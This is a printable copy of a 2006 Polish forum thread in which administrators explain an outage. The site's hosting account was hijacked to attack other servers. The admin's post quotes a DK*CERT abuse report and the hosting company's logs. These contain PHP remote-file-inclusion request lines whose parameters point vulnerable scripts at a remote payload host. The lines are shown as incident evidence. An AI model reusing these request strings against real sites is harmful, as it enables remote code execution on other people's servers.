To jest tylko wersja do druku, aby zobaczyć pełną wersję tematu, kliknij TUTAJ
IVRP.pl
polityka - militaria - kultura - podróże

Wszystko nt. forum - Co się stało z forum - WYJAŚNIENIE

Szybszy - Pią 10 Lis, 2006 20:18
Temat postu: Co się stało z forum - WYJAŚNIENIE
Witam,

W imieniu Rady Forum przepraszam za brak forum przez kilka dni. Jesteśmy już znowu a akcji i to na nowym, bezpieczniejszym serwerze. Niestety, wcięło gdzieś Hyde Park, mam nadzieję że go odzyskamy. Mogą być jeszcze inne dysfunkcje - proszę raportować je poniżej.

Co się stało?

1) Ktoś włamał się na serwer naszego, pożal się Boże, providera internetowego, i wykorzystał program forum do ataku jakichś serwerów w Wielkiej Brytanii. W komunikacie od Anglików pojawiała się kilkakrotnie strona molganinovo.r u jako prawdopodobny inicjator ataków. Dlatego zamknęli nam konto.

2) Provider nakazał zaktualizować skrypt do najnowszej wersji, dzięki czemu miał być bardziej odporny na takie ataki w przyszłości, był to warunek odwieszenia konta. Aktualizację skryptu załatwił MS, odpaliliśmy ją.... i forum się rozpieprzyło.

3) Dokładnie w tym czasie MS musiał z poważnych powodów prywatnych wyłączyć się, co pozbawiło nas wsparcia informatycznego.

Co dalej, jak zabezpieczymy się przed podobną sytuacją w przyszłości ?
a) Jak wspomniałem, zmieniliśmy dostawcę internetu na lidera polskego rynku home.pl Nikt nie jest doskonały ale japrzez 4 lata nie miałem z nimi najmniejszego problemu.
b) Przeniesiemy forum za jakiś czas z obecnego niemieckiego silnika forum na coś innego, ale z tym pośpiechu nie ma.
c) Poszukamy zaginionego Hyde Parku.

Cytat:
Otrzymalismy nastepujacy raport:

============================================================================

Subject: [DK*CERT#264171] - Scanning from 195.62.28.65
Date: Sun, 5 Nov 2006 14:20:20 +0100
From: cert@cert.dk
To: abuse@ukwebhosting.ltd.uk

Dear Administrator,

We recieved a complaint about networkscan from IP 195.62.28.65.
Please see the attached set of logs from the security software.

It might be that your host has been taken over by intruders.
Please disconnect IMMEDIATELY this host
and investigate its security status.

Otherwise please identify your customer operating from the above
address at the time mentioned, and terminate immediately his hacking
activities. Please prevent him from continuing these kind of activities
in the future as well.


This incident has been assigned the following number:

DK*CERT#264171

For future reference, please include this number in the subject line of your
e-mail.


Best regards,
DK*CERT Abuse Team,

DK*CERT
UNI*C,
DTU, Matematiktorvet, bygning 304
2800 Kgs. Lyngby

Email: cert@cert.dk
Telefon: +45 3587 8887
Web: www.cert.dk



If nothing else mentioned below, timezone is believed to be UTC+0100(CET)
Destination address(es): Adresser i nettene 130.225.16.0/22 og
130.225.2.128/25

Security logs:



[**] [1:2002:5] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
11/04-17:36:15.778136 195.62.28.65:55406 -> 130.225.16.54:80
TCP TTL:58 TOS:0x20 ID:49838 IpLen:20 DgmLen:237 DF
***AP*** Seq: 0x2881FA Ack: 0xB58CFBCB Win: 0x16D0 TcpLen: 20
GET /PB/555/templates/pb/language/lang_nl.php?temppath=http://mo
lganinovo.ru/c.txt? HTTP/1.1..TE: deflate,gzip;q=0.3..Connection
: TE, close..Host: www.daimi.au.dk..User-Agent: libwww-perl/5.80
5....

[Szybszy: tu kilka innych podobnych paragrafów inofrmujących o ataku z naszego skryptu ale pochodzącego ze strony molganinovo.ru]

[**] [1:2002:5] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
11/04-17:50:12.545123 195.62.28.65:39395 -> 130.225.16.54:80
TCP TTL:58 TOS:0x20 ID:26244 IpLen:20 DgmLen:237 DF
***AP*** Seq: 0x357AECBC Ack: 0x90B96D7F Win: 0x16D0 TcpLen: 20
GET /PB/159/templates/pb/language/lang_nl.php?temppath=http://mo
lganinovo.ru/c.txt? HTTP/1.1..TE: deflate,gzip;q=0.3..Connection
: TE, close..Host: www.daimi.au.dk..User-Agent: libwww-perl/5.80
5....

============================================================================

Po sprawdzeniu logow Panstwa konta ustalilismy nastepujacy skrypt
wykorzystany do ataku:

fnp.aplus.pl:202.143.135.34 - - [05/Nov/2006:19:33:32 +0100] "GET
//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://molganinovo.ru/c.php.txt?
HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
fnp.aplus.pl:202.143.135.34 - - [05/Nov/2006:19:37:08 +0100] "GET
//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://molganinovo.ru/c.php.txt?
HTTP/1.1" 404 5 "-" "libwww-perl/5.79"

W zwiazku z powyzszym informujemy, ze konto fnp zostalo zawieszone. Zdjecie
blokady z konta jest mozliwe tylko w momencie przeprowadzenia aktualizacji
skryptu uzywanego przez Panstwa na stronie do najnowszej dostepnej wersji, w
ktorej w/w luka w zabezpieczeniach nie wystepuje.

Posiadaja Panstwo dostep do FTP konta, prosze wgrac pliki aktualizacyjne,
kiedy beda Panstwo gotowi do przeprowadzenia aktualizacji, prosze przeslac
do nas stosowna wiadomosc, odblokujemy dostep do konta aby mogli Panstwo
dokonczyc aktualizacje.

BOK netlook.pl

--
:.: PROSCAPE Netlook.pl Webhosting & Webdesign
:.: Tel.: 091 489-59-66, 0697 40-40-44, Fax: 091 489-59-66 wew. 24
:.: Centrum Pomocy Technicznej 24h: https://support.netlook.pl
:.: Biuro Obslugi Klienta: Szczecin, ul. Niedziałkowskiego 24

agitator - Pią 10 Lis, 2006 20:58

sprawdzam tylko czy moje konto dziala ; ]]]
Hegemon - Sob 11 Lis, 2006 23:51

I jeszcze informacja dla Użytkowników, którzy zarejestrowali się pomiędzy 24 października a 10 listopada br. i nie mogą się teraz zalogować: ponieważ Forum zostało odtworzone wedle stanu na 24 października, konieczna jest z Waszej strony ponowna rejestracja. Przepraszamy za utrudnienie.
ptak - Wto 14 Lis, 2006 08:32

Hegemon napisał/a:
...ponieważ Forum zostało odtworzone wedle stanu na 24 października...


...wniosę o pociągnięcie za konsekwencje oraz rekompensatę za utraconą własność intelektualną.

Hegemon - Wto 14 Lis, 2006 13:04

Pisz acan na molganinovo.ru :P
ptak - Wto 14 Lis, 2006 14:08

Oto, jak traktuje się tu tfurcuf.


Powered by phpBB modified by Przemo © 2003 phpBB Group